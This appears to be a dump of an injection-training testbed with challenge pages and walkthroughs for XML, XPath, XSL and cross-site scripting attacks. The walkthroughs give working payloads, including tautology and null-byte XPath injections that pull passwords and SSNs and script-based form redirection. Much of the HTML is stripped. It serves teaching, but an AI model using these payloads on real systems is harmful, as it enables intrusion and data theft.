34 | Sanitization - None
35 | Output - Full results, verbose errors
36 | 

37 | 
38 | 

39 | 

40 |       
41 |       
42 |       
43 |       
44 | 	Injection String: 

45 | 	
46 | 

47 | 

48 | 
49 | 
50 | 


--------------------------------------------------------------------------------
/xmlmao/xmli_challenges/tutorial0.txt:
--------------------------------------------------------------------------------
 1 | XMLmao XMLi Challenge 0 - Hello, world!
 2 | ----------------------
 3 | In this challenge, we have an XML injection scenario: Our data is being placed into the context of an XML document without sanitization. As such, we can affect the contents of the XML document to cause mischief. In this particular scenario, we are injecting a new "data" node into the document.
 4 | 
 5 | The unaltered XML document looks like this:
 6 | 
 7 | 
 8 |  
 9 |   Inject1
10 |  
11 |  
12 | 	
13 |  
14 | 
15 | 
16 | Our injection string is replacing the content of the data node where "Inject3" appears. The "CDATA" tag means that data inside is to be interpreted as literal. Inside that tag, no XML fiddling can occur. First, we break out of that tag with the character sequence "]]>". Unfortunately, this leaves us with a malformed XML document. XML parsers are generally strict, so we'll only get an error and unhappiness. We'll get to that later. For now, our injection string looks like this:
17 | 
18 | foo]]>
19 | 
20 | We're also inside an existing data node, so we need to break out of that. We can do that by injecting an end data tag, making our injection string as follows:
21 | 
22 | foo]]>
23 | 
24 | Now we're ready to open a new data tag:
25 | 
26 | foo]]>
27 | 
28 | The only thing left is to open up a new CDATA tag and value to return us to a well-formatted document:
29 | 
30 | foo]]>
35 |  
36 |   Inject1
37 |  
38 |  
39 | 	
40 |  
41 |  
42 |     
43 |  
44 | 
45 | 


--------------------------------------------------------------------------------
/xmlmao/xmli_challenges/tutorial1.txt:
--------------------------------------------------------------------------------
 1 | XMLmao XMLi Challenge 1 - There Can Be Only One
 2 | ----------------------
 3 | In this challenge, we have two tasks: One, insert our own data tag. Two, prevent the original data tag from being parsed. Our original XML data looks like this:
 4 | 
 5 | 
 6 |  
 7 |   Inject1
 8 |  
 9 |  
10 | 	
11 |  
12 | 
13 | 
14 | Our injection string will replace "Inject2". First, we need to break out of the attribute and "hooray" tag. So, our injection string starts with:
15 | 
16 | ">
17 | 
18 | Next, we must define our data tag with the data "winrar", which completes the first task and brings us to this injection string:
19 | 
20 | ">
21 | 
22 | Unfortunately, this leaves us with broken XML and two data tags. However, the XML parser, libxml, is written in native code. Additionally, the XML is being constructed as a string before being fed into the parser. As such, we can use a null byte to prematurely end the XML and prevent the original data tag from being read, completing the second task. We'll need to ensure that our other tags are properly closed, so we add a closing tag to end the "xmlfile" node. Our final injection string looks like this:
23 | 
24 | ">%00
25 | 


--------------------------------------------------------------------------------
/xmlmao/xpath_challenges/challenge0.php:
--------------------------------------------------------------------------------
 1 | .
12 | */
13 | ?>
14 | 
15 | 
16 | 	XMLmao - XPath Challenge 0 - Hello, world!
17 | 
18 | 
19 | 
20 | 	
XMLmao - XPath Challenge 0 - Hello, world!


21 | 
22 | 	

23 | 	

24 | 	

25 | 

26 | 	
27 | You must perform the simplest of XPath injection attacks.

28 | 

29 | Your objective is to get the query to return all usernames instead of just one.
30 | 
31 | 
32 | PARAMETERS:
33 | Injection Type - String value in condition
34 | Sanitization - None
35 | Output - All results, verbose errors, query shown
36 | 

37 | 
38 | 

39 | 

40 | 	
41 | 	
42 | 	
43 | 	
44 | 	Injection String: 

45 | 	
46 | 

47 | 

48 | 
49 | 
50 | 


--------------------------------------------------------------------------------
/xmlmao/xpath_challenges/challenge1.php:
--------------------------------------------------------------------------------
 1 | .
12 | */
13 | ?>
14 | 
15 | 
16 | 	XMLmao - XPath Challenge 1 - Retrieve ALL the Nodes!
17 | 
18 | 
19 | 
20 | 	
XMLmao - XPath Challenge 1 - Retrieve ALL the Nodes!


21 | 
22 | 	

23 | 	

24 | 	

25 | 

26 | 	
27 | You must perform a very basic XPath injection attack.

28 | 

29 | Your objective is to get the query to return the entire set of nodes in the XML document.
30 | 
31 | 
32 | PARAMETERS:
33 | Injection Type - String value in condition
34 | Sanitization - None
35 | Output - All results, query shown
36 | 

37 | 
38 | 

39 | 

40 | 	
41 | 	
42 | 	
43 | 	
44 | 	Injection String: 

45 | 	
46 | 

47 | 

48 | 
49 | 
50 | 


--------------------------------------------------------------------------------
/xmlmao/xpath_challenges/challenge3.php:
--------------------------------------------------------------------------------
 1 | .
12 | */
13 | ?>
14 | 
15 | 
16 | 	XMLmao - XPath Challenge 3 - Looking Through a Keyhole
17 | 
18 | 
19 | 
20 | 	
XMLmao - XPath Challenge 3 - Looking Through a Keyhole


21 | 
22 | 	

23 | 	

24 | 	

25 | 

26 | 	
27 | You must perform an XPath injection attack in a string field. Only one value is returned.

28 | 

29 | Your objective is to pull the social security numbers from the XML document.
30 | 
31 | 
32 | PARAMETERS:
33 | Injection Type - String value in condition
34 | Sanitization - None
35 | Output - One result, generic errors, query not shown
36 | 

37 | 
38 | 

39 | 

40 | 	
41 | 	
42 | 	
43 | 	Injection String: 

44 | 	
45 | 

46 | 

47 | 
48 | 
49 | 


--------------------------------------------------------------------------------
/xmlmao/xpath_challenges/challenge4.php:
--------------------------------------------------------------------------------
 1 | .
12 | */
13 | ?>
14 | 
15 | 
16 | 	XMLmao - XPath Challenge 4 - Love is Blind
17 | 
18 | 
19 | 
20 | 	
XMLmao - XPath Challenge 4 - Love is Blind


21 | 
22 | 	

23 | 	

24 | 	

25 | 

26 | 	
27 | You must perform an XPath injection attack in a string field where no results are shown.

28 | 

29 | Your objective is to pull the social security numbers from the XML document.
30 | 
31 | 
32 | PARAMETERS:
33 | Injection Type - String value in condition
34 | Sanitization - None
35 | Output - Boolean results, no errors, query not shown
36 | 

37 | 
38 | 

39 | 

40 | 	
41 | 	
42 | 	
43 | 	Injection String: 

44 | 	
45 | 

46 | 

47 | 
48 | 
49 | 


--------------------------------------------------------------------------------
/xmlmao/xpath_challenges/tutorial0.txt:
--------------------------------------------------------------------------------
1 | XMLmao Challenge 0 - Hello, world!
2 | ----------------------
3 | The original query you're working with is /xmlfile/users/user[username='YOUR_INPUT_GOES_HERE']/username.
4 | The part in square brackets, the condition, specifies that only user nodes whose username is equal to your input. However, like the WHERE clause in a SQL statement, it is possible to nullify the condition with an "or" keyword and a tautology like "'a'='a'" such that all results are returned regardless of condition. Such a condition would look like this: [username='user' or 'a'='a'].
5 | 
6 | To cause the condition of the query to be nullified and all the usernames returned, your input should be:
7 | 
8 | user' or 'a'='a
9 | 


--------------------------------------------------------------------------------
/xmlmao/xpath_challenges/tutorial1.txt:
--------------------------------------------------------------------------------
 1 | XMLmao Challenge 1 - Retrieve ALL the Nodes!
 2 | ======================
 3 | In SQL injection, the UNION keyword joins the output of SELECT queries into one result set. The equivalent in XPath is the pipe character. If X and Y are queries, we can say that X | Y returns the results of X along with the results of Y. If we want to return every node in an XML dataset, the query would be:
 4 | 
 5 | /*
 6 | 
 7 | Our injection needs to turn both the first and second halves of the query into complete and syntactically correct XPath queries which return no data, and join their results with a query for all nodes in the database. If the query looks like this:
 8 | 
 9 | /xmlfile/users/user[username='OUR_INPUT']/username
10 | 
11 | We must complete both the portion before our input:
12 | 
13 | /xmlfile/users/user[username='
14 | 
15 | We can do this with the string a'] which makes the first query in the set look this:
16 | 
17 | /xmlfile/users/user[username='a']
18 | 
19 | We also need to complete the portion after our input:
20 | 
21 | ']/username
22 | 
23 | It's important to note that invalid node names don't result in query failure, they just return no results. So, we can use the prefix /a['a to turn the portion after our input into the following query:
24 | 
25 | /a['a']/username
26 | 
27 | Now all we need to do is join both queries with our all-nodes query using pipes, which looks like |/*| when you put it together. All in all, our resulting query will look like this:
28 | 
29 | /xmlfile/users/user[username='a']|/*|/a['a']
30 | 
31 | So, a correct answer to challenge 1 is:
32 | 
33 | a']|/*|/a['a
34 | 


--------------------------------------------------------------------------------
/xmlmao/xpath_challenges/tutorial2.txt:
--------------------------------------------------------------------------------
 1 | XMLmao Challenge 2 - The Failure of Quote Filters
 2 | =================================
 3 | In this challenge, we see how filtering single quotes is not entirely effective. In SQL Injection, this presents an interesting obstacle, but not a significant one. In XPath injection, it presents much less difficulty.
 4 | 
 5 | In "Challenge 1 - Retrieve ALL the Nodes!" we used a technique to retrieve all nodes from the document when injection occurs in a condition within the XPath query. If you're unfamiliar with that technique, you'll understand this tutorial better if you play through Challenge 1 first.
 6 | 
 7 | In this challenge, we make a very slight modification: We don't use single quotes. That's about it!
 8 | 
 9 | The query looks something like this:
10 | 
11 | /xmlfile/users/user[id=OUR_INPUT_HERE]/username
12 | 
13 | What we need to do is to make this one query into three queries; One will return the entire set of nodes in the XML dataset, the other two will return nothing. Our injection string will cause the query to look like this after injection:
14 | 
15 | /xmlfile/users/user[id=3]|/node()|/a[1]
16 | 
17 | One correct answer, then, is:
18 | 
19 | 3]|/*|/a[1
20 | 


--------------------------------------------------------------------------------
/xmlmao/xpath_challenges/tutorial4.txt:
--------------------------------------------------------------------------------
 1 | Challenge 4 - Love is Blind
 2 | ==========================
 3 | In this challenge, we have no output from the query, only an indication of whether or not the query returned results. In the previous challenge, we could retrieve one value at a time but had to use blind techniques to understand the structure of the data. We start by enumerating the structure in the same way as in the previous challenge. Instead of retrieving the value of each as in the previous example, we must now use blind techniques to extract the data.
 4 | 
 5 | A technique we can use to do so involves the substring() function. The following query will return results only if the first character in the first child node of the root is equal to 'a':
 6 | 
 7 | /*[substring(/*[1],1,1)='a']
 8 | 
 9 | We can use our query to achieve the same by manipulating the condition to hinge on the evaluation of the substring. We can do this using a known username value or with the use of the 'or' keyword.
10 | 
11 | With: /xmlfile/users/user[username='jsmiley' and substring(/*[1],1,1)='a']/username
12 | Without: /xmlfile/users/user[username='' or 1=1 and substring(/*[1],1,1)='a']/username
13 | 
14 | The "without" version is more useful as we don't need to know an existing value.
15 | 
16 | By iterating through a character set of likely characters for each character in the value to be retrieved, we can slowly determine the value.
17 | 
18 | This process can be automated using the tools "BXPI" and "XPath Blind Explorer". As of this writing, XPath Blind Explorer URL-encodes the ampersand character in GET or POST data and as such cannot properly handle pages which require multiple parameters to be set, such as XMLmao. This can be overcome by using Burp Proxy to convert any "%26" back to "&".
19 | 


--------------------------------------------------------------------------------
/xmlmao/xpath_challenges/tutorial5.txt:
--------------------------------------------------------------------------------
 1 | Challenge 5 - Pipe Dream
 2 | =====================
 3 | In this challenge, we must retrieve passwords for all the users in our database without using the pipe character. Our initial query looks like this:
 4 | 
 5 | /xmlfile/users/user[username='OUR_INPUT_HERE']/username
 6 | 
 7 | It has been said that it is not possible to comment out the end of XPath queries as is done with SQL injection attacks. While this is true, we do have an option for truncating an XPath query prematurely: The Poison Null Byte.
 8 | 
 9 | C-based languages use the null byte as a string terminator and will stop reading any string given to it when reaching a null byte. Since libxml is written in a C-based language, the XPath query given to it by our PHP script (which actually reads the whole string) will be truncated if a null byte is present. The URL-encoded version of a null byte is "%00".
10 | 
11 | As we control the portion of the query which comes before the field in the user object is selected, we can truncate the portion of the query which specifies that only the username is to be returned. We can do this by closing the condition and truncating the rest with a null byte. The final query will look like this to PHP:
12 | 
13 | /xmlfile/users/user[username='']%00']/username
14 | 
15 | And libxml will read it as:
16 | 
17 | /xmlfile/users/user[username='']
18 | 
19 | Our only problem is that this only returns the password for any user with a blank username, which is unlikely to return any data. As such, we can use our condition nullifying trick from Challenge 0 in tandem with the null byte to pull all data for all users, which includes password data. The final query looks like this:
20 | 
21 | /xmlfile/users/user[username='' or '1'='1']%00']/username
22 | 
23 | Which is read by libxml as the following:
24 | 
25 | /xmlfile/users/user[username='' or '1'='1']
26 | 
27 | This returns us the entire set of user data, without using the pipe character.
28 | 
29 | So, one correct answer to Challenge 5 is:
30 | 
31 | ' or '1'='1']%00
32 | 


--------------------------------------------------------------------------------
/xmlmao/xpath_challenges/tutorial6.txt:
--------------------------------------------------------------------------------
 1 | Challenge 6 - Up, Up, and Away!
 2 | =======================
 3 | In file paths, there is a double-dot marker (..) which points to the parent directory. For example, the path /usr/sbin/sshd could also be represented as /etc/../usr/bin/../sbin/sshd or numerous other variations. Path traversal attacks frequently utilize this to traverse upwards in a file tree and access content from a wider context. This marker is also available within XPath. As such, we can take an XPath query which returns a very specific set of results and get it to return a far wider set using parent directory markers. Our original query looks like this:
 4 | 
 5 | /xmlfile/users/user[username='jsmiley']/OUR_INPUT_HERE
 6 | 
 7 | To begin with, we have a very specific context. We can choose any field within the set of child nodes for the user 'jsmiley'. UNLESS we use path traversal techniques! One important thing to note is that with normal path traversal attacks, we can make a valid path just by throwing a metric ton of "../" on there, extra markers are simply discarded. This is not the case with XPath, we need exactly the right number.
 8 | 
 9 | As such, if we do not know the query to begin with we can simply brute force, trying one marker, then two, then three, each time ending with an asterisk to return all nodes:
10 | 
11 | ../*
12 | ../../*
13 | ../../../*
14 | 
15 | Once we stop receiving results, we know we've gone too far and traversed past the root of the document. So, one correct answer is:
16 | 
17 | ../../../*
18 | 


--------------------------------------------------------------------------------
/xmlmao/xslt_challenges/challenge0.php:
--------------------------------------------------------------------------------
 1 | .
12 | */
13 | ?>
14 | 
15 | 
16 | 	XMLmao - XSL Injection Challenge 0 - Hello, world!
17 | 
18 | 
19 | 
20 | 	
XMLmao - XSL Injection Challenge 0 - Hello, world!


21 | 
22 | 	

23 | 	

24 | 	

25 | 

26 | 	
27 | You must perform the simplest of XSL injection attacks.

28 | 

29 | Your objective is to retrieve passwords from the XML document.
30 | 
31 | 
32 | PARAMETERS:
33 | Injection Type - Static content in output
34 | Sanitization - None
35 | Output - All results, verbose errors, xml shown
36 | 

37 | 
38 | 

39 | 

40 |       
41 |       
42 |       
43 |       Injection String: 

44 |       
45 |       
46 | 

47 | 

48 | 
49 | 
50 | 


--------------------------------------------------------------------------------
/xssmh/challenges.htm:
--------------------------------------------------------------------------------
 1 | 
12 | 
13 | 
14 | 	XSSmh - Challenges
15 | 
16 | 
17 | 
18 | 
XSSmh - Challenges


19 | 

20 | 

21 | 

22 | 

23 | Challenge 0 - alert("Hello, world!");

24 | Challenge 1 - The Failure of Quote Filters

25 | Challenge 2 - Basic Persistent Threat

26 | Challenge 3 - AttriBeautiful

27 | Challenge 4 - Black Comedy

28 | Challenge 5 - Detour

29 | Challenge 6 - Up the Chain

30 | Challenge 7 - Crouching JS, Hidden Field

31 | 

32 | 

33 | 
34 | 
35 | 


--------------------------------------------------------------------------------
/xssmh/challenges/challenge0.php:
--------------------------------------------------------------------------------
 1 | .
12 | */
13 | ?>
14 | 
15 | 
16 | 	XSSmh - Challenge 0 - alert("Hello, world!");
17 | 
18 | 
19 | 
20 | 	
XSSmh - Challenge 0 - alert("Hello, world!");


21 | 
22 | 	

23 | 	

24 | 	

25 | 

26 | 	
27 | You must perform the simplest of XSS attacks.

28 | 

29 | Your objective is to cause an alert box to pop up on the resulting page.

30 | (Note: Some browsers have anti-XSS protections which prevent this from working. Try using Firefox, Safari, or old versions of Internet Explorer.)
31 | 
32 | 
33 | PARAMETERS:
34 | Injection Type - Injection into HTML body
35 | Sanitization - None
36 | 

37 | 
38 | 

39 | 

40 | 	
41 | 	Injection String: 

42 | 	
43 | 

44 | 

45 | 
46 | 
47 | 


--------------------------------------------------------------------------------
/xssmh/challenges/challenge2.php:
--------------------------------------------------------------------------------
 1 | .
12 | */
13 | ?>
14 | 
15 | 
16 | 	XSSmh - Challenge 2 - Basic Persistent Threat
17 | 
18 | 
19 | 
20 | 	
XSSmh - Challenge 2 - Basic Persistent Threat


21 | 
22 | 	

23 | 	

24 | 	

25 | 

26 | 	
27 | You must perform the simplest of persistent XSS attacks.

28 | 

29 | Your objective is to cause an alert box to pop up on the resulting page.

30 | (Note: Use any browser you like for this, browser based anti-XSS protections do not apply to persistent flaws.)
31 | 
32 | 
33 | PARAMETERS:
34 | Injection Type - Injection into HTML body
35 | Sanitization - None
36 | 

37 | 
38 | 

39 | 

40 | 	
41 | 	
42 | 	Injection String: 

43 | 	
44 | 

45 | 

46 | 
47 | 
48 | 


--------------------------------------------------------------------------------
/xssmh/challenges/tutorial0.txt:
--------------------------------------------------------------------------------
1 | XSSmh - Challenge 0 - alert("Hello, world!");
2 | ---------------
3 | This challenge tasks you with the most basic form of cross-site scripting attack possible.
4 | 
5 | All you need to do is write a script directly into the injection point, like so:
6 | 
7 | 
8 | 


--------------------------------------------------------------------------------
/xssmh/challenges/tutorial1.txt:
--------------------------------------------------------------------------------
 1 | XSSmh - Challenge 1 - The Failure of Quote Filters
 2 | ---------------
 3 | In this challenge, you must write a script into the resulting HTML which does not use single or double quotes.
 4 | 
 5 | There are several ways to achieve this, one of the simplest is using regular expressions and the "source" property.
 6 | 
 7 | 
 8 | 
 9 | Another variation uses the "String.fromCharCode" method. This is slightly more complex, but has the advantage that you don't need your string to be a valid regular expression and is thus more flexible. This involves converting your string into a series of bytes in ASCII decimal representation. For instance, the decimal value of 'h' is 104. The same alert box could be built using the following syntax:
10 | 
11 | 
12 | 


--------------------------------------------------------------------------------
/xssmh/challenges/tutorial2.txt:
--------------------------------------------------------------------------------
 1 | XSSmh - Challenge 2 - Basic Persistent Threat
 2 | ---------------
 3 | This challenge tasks you with the most basic form of cross-site scripting attack possible.
 4 | 
 5 | All you need to do is write a script directly into the injection point, like so:
 6 | 
 7 | 
 8 | 
 9 | This challenge is in XSSmh not to allow you to launch some complicated attack, it is simply to demonstrate the limitations of XSS protections which aren't based in good programming practices.
10 | 
11 | To my knowledge, there is no WAF, browser or browser add-on which will prevent Javascript execution in a persistent scenario. (Please correct me if I am mistaken.)
12 | 


--------------------------------------------------------------------------------
/xssmh/challenges/tutorial3.txt:
--------------------------------------------------------------------------------
 1 | XSSmh - Challenge 3 - AttriBeautiful
 2 | ---------------
 3 | In this challenge, you must cause Javascript to execute when injecting inside an existing HTML tag and without breaking out of the tag.
 4 | 
 5 | This involves adding another attribute to the HTML tag which executes Javascript. This can be done using event handlers. Browsers support attributes which define Javascript to be executed when certain events occur, like a mouse click.
 6 | 
 7 | One of the easiest to use is "onload" which executes Javascript as soon as a part of the DOM has been loaded. However, as we're injecting into an "input" tag, the "onload" attribute cannot be used. Instead, we can use "onmouseover", which executes Javascript when the mouse cursor moves over the element.
 8 | 
 9 | Our original input tag looks as follows:
10 | 
11 | Our injection string can be:
12 | test" onmouseover="alert(1)" fakeattribute="
13 | Which results in the following input tag:
14 | 
15 | 
16 | Once a user mouses over the input box, an alert box is displayed.
17 | 
18 | Additionally, we can use CSS to expand the input box to cover the entire window, making a mouseover event far more likely. We do this by adding a "style" attribute, which allows us to specify CSS attributes in-line. We specify absolute positioning, a position at the upper left corner of the window, and a width and height of 100%, ensuring 100% coverage of the window.
19 | 
20 | Our injection string looks like this:
21 | test" onmouseover="alert(1)" style="position:absolute;top:0px;left:0px;width:100%;height:100%" fakeattribute="
22 | Resulting in the following input tag, one covers the entire window and which fires Javascript code when the mouse moves over the window:
23 | 
24 | 


--------------------------------------------------------------------------------
/xssmh/challenges/tutorial4.txt:
--------------------------------------------------------------------------------
 1 | XSSmh - Challenge 4 - Black Comedy
 2 | ---------------
 3 | In this challenge, you must cause Javascript to execute without using the word "script".
 4 | 
 5 | This is deceptively easy. As we learned in the previous challenge, we can use event handler attributes to cause Javascript execution. When we control the whole tag, it is even easier.
 6 | 
 7 | One way we can do this is with a "body" tag bearing an "onload" attribute:
 8 | 
 9 | 
10 | You could also use an "img" tag with a bad "src" attribute and an "onerror" attribute which will fire as soon as the image loading fails:
11 | 
12 | 
13 | Additionally, other tags allow onerror and onload attributes, like the  tag:
14 | 
15 | 


--------------------------------------------------------------------------------
/xssmh/challenges/tutorial5.txt:
--------------------------------------------------------------------------------
 1 | XSSmh - Challenge 5 - Detour
 2 | ---------------
 3 | This challenge deviates from the previous ones in that the difficulty is not in gaining Javascript execution, but in utilizing it effectively. Javascript has the ability to modify the existing DOM, and one effective attack is to redirect a form submission to somewhere else. This is what you are tasked with doing in this challenge.
 4 | 
 5 | In order to understand how this is done, we must understand how to reference DOM objects from Javascript. Let's abstract it a little and pretend we're referencing the city of Boston in the United States. We could do so like this:
 6 | 
 7 | earth.northAmerica.unitedStates.massachusetts.boston
 8 | 
 9 | We start by referencing the most wide item, and slowly work our way down the hierarchy to specify the element we want. If we want to reference the "action" attribute of the 2nd form in our document, we do so with the following path:
10 | 
11 | document.forms[1].action
12 | 
13 | We can then set this to an arbitrary location through simple assignment. So, our attack string would look like this:
14 | 
15 | 
16 | 


--------------------------------------------------------------------------------
/xssmh/includes/nav.inc.php:
--------------------------------------------------------------------------------
 1 | .
12 | */
13 | ?>
14 | 

15 | | Cross-Site Scripting || Challenges |
16 | 

17 | 
18 | 

19 | 

20 | 

21 | 

22 | 


--------------------------------------------------------------------------------
/xssmh/index.php:
--------------------------------------------------------------------------------
 1 | .
12 | */
13 | 
14 | header('Location: xss.php');
15 | 
16 | ?>
17 | 


--------------------------------------------------------------------------------
/xssmh/pxss.html:
--------------------------------------------------------------------------------
1 | Uh, this is awkward. You haven't written anything here yet.
2 | 


--------------------------------------------------------------------------------
/xssmh/setup.sh:
--------------------------------------------------------------------------------
 1 | #########################################################################
 2 | #
 3 | # Magical Code Injection Rainbow - A set of configurable injection testbeds 
 4 | # Daniel "unicornFurnace" Crowley
 5 | # Copyright (C) 2014 Trustwave Holdings, Inc.
 6 | # 
 7 | # This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version.
 8 | # 
 9 | # This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
10 | # 
11 | # You should have received a copy of the GNU General Public License along with this program. If not, see .
12 | #
13 | ########################################################################
14 | 
15 | echo "Hey there\! Thanks for installing XSSmh. Enjoy\!"
16 | chmod 666 pxss.html && echo "Hooray\! Everything went fine\!" || echo "Couldn't chmod pxss.html. Do it manually or run setup.sh as root.";
17 | 


--------------------------------------------------------------------------------